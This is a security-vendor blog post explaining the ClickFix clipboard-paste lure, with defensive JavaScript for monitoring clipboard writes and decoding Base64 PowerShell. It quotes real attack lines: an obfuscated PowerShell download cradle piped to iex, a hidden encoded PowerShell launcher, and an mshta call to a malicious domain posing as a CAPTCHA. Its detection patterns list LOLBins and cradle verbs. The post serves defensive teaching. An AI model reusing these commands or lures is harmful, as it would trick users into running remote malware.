
ClickFix: The What, Why, Where, and How of it All

Erin Kuffel
June 17, 2025

What is ClickFix?
Silent Copying to Clipboard

ClickFix is a social engineering technique in which a web page silently writes attacker-controlled text to the user's clipboard and then talks the user into pasting it somewhere it will run. The goal is to get code that originated in the browser executed on the host machine, with the user doing the pasting and pressing Enter without realising what the pasted text actually is.

The name comes from the first lures, which told the user to "fix" a problem with their browser. The term ClickFix is now applied to any attack with the same shape: a page populates the victim's clipboard and prompts them to paste the contents into a terminal or run box on the device.

What is a Typical Encounter?

Unlike traditional malware delivery that exploits a software vulnerability, ClickFix relies entirely on user actions. It typically begins with a user browsing to a malicious or compromised web page and meeting a prompt that tells them first to click a button (the click is the user gesture that lets the page's JavaScript write to the clipboard) and then to paste into a trusted host interface, such as the Windows Run dialog (Windows key + R) or an administrative PowerShell window.

Image of Windows Run terminal (opened by clicking the Windows button + R), with malicious PowerShell code pasted into it.

Upon pressing Enter, the pasted command usually acts as a download cradle: it fetches and runs next-stage payloads, from additional malware to remote access tools, and from that point the attacker can do whatever the compromised user account allows.
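The clipboard write that makes all of this possible is a single Clipboard API call made from the button's click handler, and that same call is where a browser-side control can intervene. The block below is an added example, not Keep Aware's code or code from any real campaign: it wraps writeText so that every write is logged and command-looking text is silently dropped. navigator.clipboard is replaced by a constructed stand-in so the code runs in Node.js, and defaultPolicy, installClipboardMonitor, simulateCopyFixClick and the sample payload are all assumptions made for the illustration.

```javascript
// Added example (not Keep Aware's code): hooking the Clipboard API so that a page's silent
// clipboard write is logged and, if it looks like a command, neutralised before it lands.
// The page-side click handler and the clipboard object are constructed stand-ins so this
// runs in Node.js; in a browser extension you would pass navigator.clipboard instead.

// Minimal policy: anything that looks like a command destined for Run or PowerShell.
// (A production policy would also decode Base64 layers before deciding.)
const COMMAND_LIKE = /\b(?:powershell|pwsh|mshta|cmd)(?:\.exe)?\b|-(?:w|windowstyle)\s*(?:hidden|1)\b|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}|\biex\b/i;
function defaultPolicy(text) {
  return COMMAND_LIKE.test(text) ? 'block' : 'allow';
}

// Wraps clipboard.writeText. Blocked writes resolve normally but write nothing, so the page
// cannot tell it was stopped and has no reason to try another copy path.
function installClipboardMonitor(clipboard, policy = defaultPolicy) {
  const log = [];
  const originalWriteText = clipboard.writeText.bind(clipboard);
  clipboard.writeText = function monitoredWriteText(text) {
    const payload = String(text);
    const verdict = policy(payload);
    log.push({ at: new Date().toISOString(), verdict, payload });
    if (verdict === 'block') return Promise.resolve();
    return originalWriteText(payload);
  };
  return {
    log,
    uninstall() { clipboard.writeText = originalWriteText; },
  };
}

// Constructed stand-in for navigator.clipboard (the real one is async and gesture-gated).
function makeFakeClipboard() {
  const state = { contents: '' };
  return {
    state,
    writeText(text) { state.contents = String(text); return Promise.resolve(); },
    readText() { return Promise.resolve(state.contents); },
  };
}

// Constructed stand-in for a ClickFix page's "Copy fix" / "I am not a robot" click handler.
// Real pages do exactly this inside a click listener: the click is the user gesture the
// Clipboard API requires, and the text written need not match anything shown on screen.
function simulateCopyFixClick(clipboard, payload) {
  return clipboard.writeText(payload);
}

// Inert constructed payload: it only echoes text, but it has the shape the policy watches for.
const CONSTRUCTED_PAYLOAD = 'powershell -w hidden -c "Write-Host \'constructed sample\'"';

function demo() {
  const clipboard = makeFakeClipboard();
  const monitor = installClipboardMonitor(clipboard);
  simulateCopyFixClick(clipboard, CONSTRUCTED_PAYLOAD); // blocked: clipboard stays empty
  clipboard.writeText('meeting notes for Tuesday');    // allowed: ordinary copy still works
  monitor.uninstall();
  return { contents: clipboard.state.contents, log: monitor.log };
}

console.log(demo());
```

In a browser extension the same installClipboardMonitor(navigator.clipboard) call goes in a script injected into the page's own JavaScript world before the page's scripts run. The legacy copy path (document.execCommand('copy') with a copy event listener that calls clipboardData.setData) needs an equivalent hook, otherwise a page that uses it bypasses the monitor entirely.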

Why is ClickFix a Threat?
Lateral Movement, from Browser to Host Machine

In Keep Aware's model ClickFix is a lateral movement step: it carries the attacker from code running inside the browser to code running on the underlying host. The transition is almost always made by a download cradle carried in the clipboard-pasted command.

Typical download cradles are PowerShell one-liners, often Base64-encoded, almost always run with a hidden window (-W Hidden or its numeric form -w 1), and frequently written in randomised letter case to evade naive string matching, like:

pOWeRSHelL -W HIDdEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vZGlydmVy...') | iex"

Partial PowerShell snippet copied to the user's clipboard from a malicious site. The Base64 string decodes to a download cradle beginning iex (iwr 'https://, that is, Invoke-WebRequest to fetch a script and Invoke-Expression to run it in memory.

ipconfig /flushdns

$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";
$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));
Invoke-Expression $MUI;

[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc `"...`"") | Out-Null;

exit;

Another PowerShell example, discussed in more detail in a separate blog post. The innocuous-looking first stage is misdirection: $Diagnostics decodes to Set-Clipboard -Value " ";, which wipes the clipboard so the pasted command is no longer there to be inspected, and ipconfig /flushdns merely clears the local DNS cache. The real work is the Process.Start line, which launches a child PowerShell with a relaxed execution policy (-ep RemoteSigned), a hidden window (-w 1) and a Base64-encoded command (-enc, payload elided).

Other real-world examples use different living-off-the-land binaries (LOLBins, catalogued by the LOLBAS project), such as mshta, to fetch and execute the next stage:

mshta https://simplerwebs.world/mine.json #  ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

Mshta.exe call, copied to the user’s clipboard, from a malicious site.
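A defender who captures what a page wrote to the clipboard needs to triage it quickly, and the samples above show the two layers that need unwrapping: a Base64 string handed to FromBase64String (UTF-8) and a Base64 string handed to -enc (UTF-16LE, as PowerShell's -EncodedCommand requires). The block below is an added example, not Keep Aware's code: it decodes both forms, scans every layer for ClickFix indicators, and returns a verdict. The indicator list, the sample payloads and the example.invalid URLs are constructed for the illustration; the one literal taken from the page is the $Diagnostics string, which decodes to Set-Clipboard -Value " ";. It needs Node.js for Buffer.

```javascript
// Added example (not Keep Aware's code, not any real campaign's): triage of a string that a
// page tried to place on the clipboard. Decodes the two Base64 forms seen in ClickFix
// cradles and reports which indicators were found. Node.js 18+ (uses the Buffer global).

const INDICATORS = [
  ['lolbin', /\b(?:powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|msiexec|bitsadmin|certutil)(?:\.exe)?\b/i],
  // -w / -win / -WindowStyle followed by "hidden" or its enum value 1
  ['hidden-window', /(?:^|\s)-(?:w|win|windowstyle)\s*(?:hidden|1)\b/i],
  // -e / -ec / -enc / -EncodedCommand followed by a Base64 blob
  ['encoded-command', /(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/]{16,}={0,2}/i],
  ['download-cradle', /\b(?:iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b/i],
  ['clipboard-wipe', /set-clipboard|\|\s*clip\b/i],
  ['captcha-lure', /i\s*am\s*not\s*a\s*robot|verification\s*id/i],
  ['url', /https?:\/\/[^\s'"]+/i],
];
const STRONG = new Set(['lolbin', 'hidden-window', 'encoded-command', 'download-cradle']);
const PRINTABLE = /^[\t\n\r\x20-\x7e]+$/;

// Find Base64 blobs and decode them. -EncodedCommand is always UTF-16LE; any other quoted
// blob (e.g. a FromBase64String argument held in a variable) is tried as UTF-8 first.
function decodeEmbeddedBase64(text) {
  const out = [];
  for (const m of text.matchAll(/-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/]{16,}={0,2})/gi)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf16le');
    if (PRINTABLE.test(decoded)) out.push({ encoding: 'utf16le', source: m[1], decoded });
  }
  for (const m of text.matchAll(/['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g)) {
    const raw = Buffer.from(m[1], 'base64');
    for (const encoding of ['utf8', 'utf16le']) {
      const decoded = raw.toString(encoding);
      if (PRINTABLE.test(decoded)) { out.push({ encoding, source: m[1], decoded }); break; }
    }
  }
  return out;
}

// Scan the text and every layer decoded out of it; the cradles above are one or two layers deep.
function triageClipboardPayload(text) {
  const findings = [];
  const decodedLayers = [];
  const seen = new Set();
  const queue = [String(text)];
  while (queue.length > 0) {
    const layer = queue.shift();
    if (seen.has(layer)) continue;
    seen.add(layer);
    for (const [name, re] of INDICATORS) {
      if (re.test(layer) && !findings.includes(name)) findings.push(name);
    }
    for (const d of decodeEmbeddedBase64(layer)) {
      decodedLayers.push(d);
      queue.push(d.decoded);
    }
  }
  const verdict = findings.some((f) => STRONG.has(f)) ? 'clickfix-suspect' : 'benign';
  return { verdict, findings, decodedLayers };
}

// Constructed samples (not real IOCs); example.invalid is a reserved placeholder domain.
const SAMPLE_ENCODED = Buffer.from("IEX (IWR 'https://example.invalid/stage2.ps1')", 'utf16le').toString('base64');
const SAMPLE_TWO_STAGE = [
  'ipconfig /flushdns',
  '$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";', // the one literal taken from the snippet above
  '$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));',
  'Invoke-Expression $MUI;',
  `[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc ${SAMPLE_ENCODED}") | Out-Null;`,
].join('\n');
const SAMPLE_MSHTA = 'mshta https://example.invalid/verify.json # I am not a robot - Verification ID: 0000';
const SAMPLE_BENIGN = 'git clone https://example.invalid/repo.git';

for (const s of [SAMPLE_TWO_STAGE, SAMPLE_MSHTA, SAMPLE_BENIGN]) {
  const r = triageClipboardPayload(s);
  console.log(r.verdict, r.findings.join(','), r.decodedLayers.map((d) => d.decoded));
}
```

The verdict only turns on the strong indicators (a LOLBin, a hidden window, an encoded command, or a cradle verb); the URL and lure-phrase findings are context for an analyst, not grounds for a block on their own, because ordinary copied text contains URLs all the time.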

Within Keep Aware’s browser-based attacker TTP framework, ClickFix is tracked under the Lateral Movement tactic. The goal of ClickFix and similar attacks is clear: get users to transfer the threat from the browser environment into the host device, where much more damage can be done to the user, their data, and the organization.

Where Has ClickFix Been Spotted? 

ClickFix has been observed on both maliciously crafted sites and legitimate but compromised web pages. Threat actors rely on three primary avenues to lure users into these traps: malvertising, SEO poisoning, and phishing emails.

ClickFix has been observed in a variety of threat campaigns, often disguised as fake prompts:

Fake Browser Update Prompts: Most notably in the ClearFake campaign, where users are tricked into believing their browser is out of date or has some sort of issue. A modal window appears with instructions to copy/paste commands into Windows+R (the Windows Run dialog).

A compromised web page social engineers a user to “fix” their browser by pasting malicious code into an administrative PowerShell terminal. When the user clicks the "Copy fix" button, the user unknowingly has allowed JavaScript to populate the system clipboard with the malicious code.

Fake CAPTCHA Pages: These are increasingly popular. Users are told to “verify” themselves by following step-by-step instructions—including clipboard manipulation and system command execution.

Two malicious sites each prompt a user to “verify” they are not a robot. Upon clicking the fake CAPTCHA, the web page silently populates the system clipboard with malicious code and the user encounters steps to "prove" they are human—by pasting the malicious code into the Windows Run dialog terminal.

ClickFix-style lures have also appeared in more sophisticated campaigns that deploy information stealers and remote access tools. One recent campaign hijacked Discord invite links and used a fake CAPTCHA ClickFix page to deliver Skuld Stealer, which targets cryptocurrency wallets, and AsyncRAT, which gives the attacker remote access to the victim's device.

How to Spot ClickFix?

Usually shown in a modal overlay, the hallmark of a ClickFix attempt is a prompt with phrasing like:

"Copy the below command" or "Click the button"

and

"Open Windows Button + R and paste this" or "Open Windows PowerShell and right-click"

(in a PowerShell console window, a right-click pastes the clipboard contents). These cues should immediately raise red flags. No legitimate web page needs you to open Run or PowerShell and paste a command in order to fix your browser or to prove you are human.

Examples of what ClickFix prompts may look like.

Conclusion

ClickFix attacks attempt to persuade a user to unknowingly copy, paste, and execute malicious code from the browser onto the host device. These attacks rely entirely on two key factors: user compliance and the browser’s access to the system clipboard. This is precisely where visibility and enforcement matter most. Keep Aware, a browser security platform, is purpose-built to detect these deceptive interactions, in real time, in the browser. 

By monitoring clipboard access patterns, identifying suspicious web pages, and disrupting lateral movement techniques like ClickFix, Keep Aware empowers organizations to stop attacks before they jump from browser to host.

ClickFix is simple and straightforward, but its consequences are not. As a rule of thumb:

Never follow a prompt to open a system application, like Windows Run or PowerShell, and paste text from an unexpected web page.
